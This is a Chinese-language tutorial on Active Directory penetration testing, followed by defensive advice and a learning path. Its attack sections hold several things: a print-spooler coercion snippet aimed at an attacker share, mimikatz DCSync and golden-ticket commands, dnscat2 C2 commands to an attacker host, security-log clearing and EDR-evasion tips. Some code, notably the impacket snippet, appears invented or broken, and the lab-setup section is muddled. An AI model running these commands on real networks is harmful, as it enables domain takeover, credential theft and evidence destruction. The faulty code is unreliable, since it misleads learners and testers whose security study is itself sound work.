域渗透实战:内网攻防知识体系与技术解析

📅 2026/8/11 16:52:49
域渗透实战:内网攻防知识体系与技术解析
1. 域渗透实战从零构建内网攻防知识体系刚接触内网安全时我曾以为域渗透是遥不可及的黑客技术。直到某次企业授权测试中我通过打印机漏洞拿到初始立足点花了两周时间最终拿下整个域控。这段经历让我明白域渗透不是魔法而是由一系列可复现的技术环节组成的系统工程。下面我就用真实的渗透测试视角带你看懂域环境攻防的完整链条。2. 环境认知Active Directory基础架构剖析2.1 域环境核心组件域控制器(DC)存储所有账户信息的中央数据库通常运行Kerberos认证服务。实战中定位DC的方法很简单nltest /dclist:域名或者直接解析_ldap._tcp.dc._msdcs.域名的DNS记录组策略对象(GPO)管理员批量配置客户端的工具却可能成为攻击者的提权跳板。通过gpresult /R可查看当前应用策略信任关系企业并购时产生的跨域信任可能引发域间横向移动。使用nltest /domain_trusts枚举信任域关键技巧在初始信息收集中一定要记录下域功能级别(Domain Functional Level)这决定了可用的攻击手法。Windows Server 2016之前的域环境往往存在更多可利用的协议特性。2.2 常见内网服务风险点通过自动化工具扫描时要特别关注这些高价值目标# 使用PowerShell快速识别关键服务 Get-ADComputer -Filter * | ForEach-Object {Test-NetConnection $_.Name -Port 389,636,88,445}LDAP服务(389/tcp)账号信息泄露的重灾区SMB服务(445/tcp)永恒之蓝等漏洞的温床Kerberos服务(88/tcp)黄金票据攻击的入口DNS服务(53/udp)常被忽视的通道化工具3. 突破边界初始立足点获取实战3.1 钓鱼攻击的精准化演进传统邮件附件钓鱼已过时现在更流行Office文档模板注入修改Normal.dotm模板实现持久化LNK文件伪装结合WMI事件订阅实现无文件驻留浏览器0day组合如CVE-2021-40444这类漏洞利用链3.2 服务漏洞利用实例以经典的打印机漏洞为例# 模拟MS-RPRN漏洞利用 import impacket from impacket.dcerpc.v5 import rprn binding rprn.MSRPRN(192.168.1.10) binding.connect() binding.OpenPrinter(\\\\attacker_ip\\malicious_share)这个漏洞之所以危险在于它强制目标主机向攻击者发起认证请求从而捕获NTLM哈希。4. 权限提升从普通用户到域管理员4.1 本地提权方法论服务账户滥用查找配置错误的服务账户Get-WmiObject -Class Win32_Service | Where-Object {$_.StartName -notmatch LocalSystem|NT Authority}组策略首选项解密获取的cpasswordgpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqhZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ令牌窃取特别是SeImpersonatePrivilege权限4.2 横向移动技术矩阵技术手段所需条件检测难度Pass-the-Hash本地管理员权限★★☆☆☆Overpass-the-Hash普通域账号★★★☆☆DCSync攻击获取域管理员等效权限★★★★☆Kerberoasting任何域账号★★☆☆☆5. 权限维持隐蔽后门建设指南5.1 黄金票据制作全流程获取krbtgt账户的NTLM哈希mimikatz # lsadump::dcsync /domain:test.com /user:krbtgt计算域SIDGet-ADDomain | Select-Object DomainSID生成票据mimikatz # kerberos::golden /admin:fakeuser /domain:test.com /sid:S-1-5-21-... /krbtgt:hash /ptt5.2 隐蔽通信通道建设DNS隧道使用dnscat2建立C2通道# 攻击端 ruby dnscat2.rb --dns domaintest.com --secret123456 # 目标端 dnscat2-client --dns serverattacker.test.com --secret123456ICMP隐蔽隧道icmpsh工具集HTTP/S混合流量Cobalt Strike的Malleable C2配置6. 痕迹清理与对抗检测6.1 日志清除实操安全日志清除wevtutil cl Security单条日志删除需要SYSTEM权限EventLog log new EventLog(Security); log.Entries.RemoveAt(entryIndex);6.2 EDR规避技巧内存扫描对抗使用Process Hollowing技术API调用混淆通过Syscall直接调用NTDLL父进程欺骗伪装成合法进程的子进程7. 防御视角企业防护体系建设建议7.1 关键防护策略启用LSA保护需Windows 10/2016以上[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] RunAsPPLdword:00000001限制域管理员登录范围Set-ADAccountControl -Identity Domain Admins -LogonWorkstations DC01,DC02启用Windows Defender攻击面减少规则7.2 监控策略配置示例!-- Sysmon配置片段 -- RuleGroup name groupRelationor NetworkConnect onmatchinclude DestinationPort conditionis53/DestinationPort Image conditionend withnslookup.exe/Image /NetworkConnect /RuleGroup8. 学习路径从入门到精通的资源地图8.1 实验环境搭建自动化工控系统使用Siemens SIMATIC虚拟PLC域环境模拟# 使用自动化脚本搭建测试域 git clone https://github.com/BloodHoundAD/BloodHound-Tools cd BloodHound-Tools/SharpHound Invoke-BloodHound -CollectionMethod All -Domain testlab.local8.2 推荐学习路线基础阶段1-3个月《Windows Internals》第七卷TryHackMe的Windows Fundamentals模块进阶阶段3-6个月Hack The Box企业级靶机如Active、Forest复现CVE-2020-1472等经典域漏洞实战阶段6个月参与Bug Bounty项目搭建自己的域渗透实验集群在最近一次红队评估中我们发现某企业虽然部署了新一代防火墙却因为某个开发服务器的Service Principal Name配置不当导致整个域在47分钟内沦陷。这再次验证了安全防护中最薄弱的环节往往是人而非技术。建议每个想学习内网安全的同学先从搭建自己的实验域开始用攻击者的视角理解防御策略的真正价值。